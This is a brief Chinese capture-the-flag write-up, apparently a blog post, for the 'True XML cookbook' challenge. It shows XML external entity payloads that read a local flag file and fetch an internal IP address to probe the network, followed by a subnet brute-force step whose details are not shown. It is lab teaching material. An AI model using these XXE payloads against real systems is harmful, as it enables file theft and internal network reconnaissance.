True XML cookbook

worker..2024-08-26 1:38

打开题目

看到登录口

随便输入admin,123456,然后抓包试一下

先按原来那道题的payload进行测试,payload和结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "file:///flag">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

未成功获取到flag信息,试着探测内网信息,读取下系统内的配置文件信息看是否能发现有用的信息

这里获得一个新的地址,尝试下进行连接结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "http://10.244.80.49/">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

连接失败,那就查询下同网段内存在不存在其他地址,使用bp的爆破模块进行爆破,设置如下:

扫描可得到flag

相关推荐
拾忆,想起1 天前
Dubbo多协议暴露完全指南:让一个服务同时支持多种通信方式
xml·微服务·性能优化·架构·dubbo
春蕾夏荷_7282977251 天前
c++ 将xml数据写入sqlite数据库
xml·数据库
秦奈1 天前
Unity复习学习随笔(六):XML数据
xml·学习
jiayong232 天前
Spring XML解析与BeanDefinition注册详解
xml·java·spring
就叫飞六吧3 天前
Spring 框架中的 Bean 继承:`parent` 属性 (XML配置)
xml·java·spring
极客智造3 天前
深入解析.NET 中的 XDocument:解锁 XML 处理的高级特性
xml·.net
聊询QQ:688238864 天前
锂离子电池恒流恒压充电Simulink仿真模型(CC - CV)探秘
xml
hnlgzb4 天前
material3和xml的UI会相差很大么?
xml·ui
小润nature4 天前
LVGL Pro XML 核心原理
xml
Hui Baby6 天前
回顾-springboot自定义xml
xml·java·spring boot
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03【AutoGLM部署】本地私有化部署AI手机Agent04【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)05Linux下V2Ray安装配置指南06Open-AutoGLM Windows 安装部署教程07Cursor 又偷偷更新,这个功能太实用:Visual Editor for Cursor Browser08在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)09BongoCat - 跨平台键盘猫动画工具10Windows 11 官方系统安装与重装完整教程(2025年最新版)